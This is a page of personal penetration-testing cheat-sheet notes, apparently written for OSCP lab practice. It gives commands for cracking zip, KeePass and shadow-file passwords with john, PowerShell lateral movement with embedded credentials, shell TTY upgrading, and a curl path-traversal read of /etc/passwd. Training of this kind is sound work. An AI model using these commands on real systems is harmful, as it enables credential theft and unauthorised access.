M4RCG04M
  • 👨‍💻Welcome to my GitBook
  • WRITEUPS
    • HackTheBox
      • Windows
        • Remote
      • Linux
        • Jarvis
        • Tabby
    • Proving Grounds Play
      • BBScute
      • FunBoxEasyEnum
      • Monitoring
      • Loly
      • Pelican
      • Payday
      • Snookums
  • OSCP Preparation List
    • Hack The Box
    • Proving Grounds
  • NOTES
    • UTILS
      • Useful Files
      • Payloads
      • Lateral Movement
    • ENUMERATION
      • Port 79 (finger)
      • Port 80 (HTTP)
      • Port 111 (RPCBIND)
      • PORT 161/udp (SNMP)
      • PORT 389,636,3268,3269 (LDAP)
      • Port 6697 (IRCD)
      • Database Analysis
      • Grafana
    • FILE TRANSFERS
    • ACTIVE DIRECTORY
      • Known Vulnerabilities
      • Without Credentials
        • Classic Attacks
      • With Username
      • Valid Credentials
      • Lateral Move
      • ACLs/ACEs permissions
      • Active Directory Certificate Services (AD CS)
      • Administrator account
      • Domain Admin
    • EXPLOTATION
      • Port 53 (DNS)
      • Port 80 (HTTP)
        • CMS
        • SQL INJECTION
        • XXE
        • File Upload
        • Cross Site Scripting (XSS)
      • Port 3389 (RDP)
      • Password Attacks
        • Hash Cracking
    • PRIVILEGE ESCALATION
      • Windows
        • Enumeration
        • Windows User Privileges
        • Windows Group Privileges
        • Weak Permissions
        • Windows Vulnerabilities
        • Credential Hunting
        • Tools
      • Linux
        • Enumeration
Powered by GitBook
On this page
  • Unzip encrypted zips
  • Kepass Master Password decode
  • DECODE BASE64
  • CRACK SHADOW TXT
  • CMD Lateral Movement
  • TTY Treatment
  • CURL
  1. NOTES

UTILS

Unzip encrypted zips

zip2john file > zip.file john zip.file -wordlist:/wordlistPath

Create user list with names

username-anarchy --input-file names.txt --select-format first,flast,first.last,firstl > usernames.txt

Kepass Master Password decode

keepass2john data.kdbx > hash.txt
john -wordlist=/usr/share/wordlists/rockyou.txt

DECODE BASE64

echo -n "cadena" | base64 -d; echo

CRACK SHADOW TXT

We need the passwd and the shadow file

unshadow passwd.txt shadow.txt > unshadowed.txt
john --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt

CMD Lateral Movement

$user = "machineName\user"
$password = ConvertTo-SecureString "butterfly!#1" -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential($user, $password)

Invoke-Command -Credential $cred -ComputerName SNIPER -ScriptBlock { whoami }

TTY Treatment

Para poder tener una terminal interactiva debemos seguir estos pasos:

  1. Una vez ganamos acceso al sistema añadimos el siguiente comando:

script /dev/null -c bash

  1. CTRL + Z

  2. Ponemos el siguiente comando:

stty raw -echo; fg

  1. Reseteamos el xterm

reset xterm

  1. Exportamos variables TERM y BASH

export TERM=xterm
export SHELL=bash

  1. Ajustamos el tamaño de la ventana. Para esto deberemos saber el tamaño de nuestra terminal con el comando:

stty size
stty rows x columns y

CURL

Verbose output

curl -v http://<DOMAIN>

POST Method

curl -X POST http://<DOMAIN>

PUT Method

curl -X PUT http://<DOMAIN>

Use --path-as-is to handle /../ or /./ in the given URL

curl --path-as-is http://<DOMAIN>/../../../../../../etc/passwd

File Upload

curl -F myFile=@<FILE> http://<RHOST>

PreviousProving GroundsNextUseful Files

Last updated 4 months ago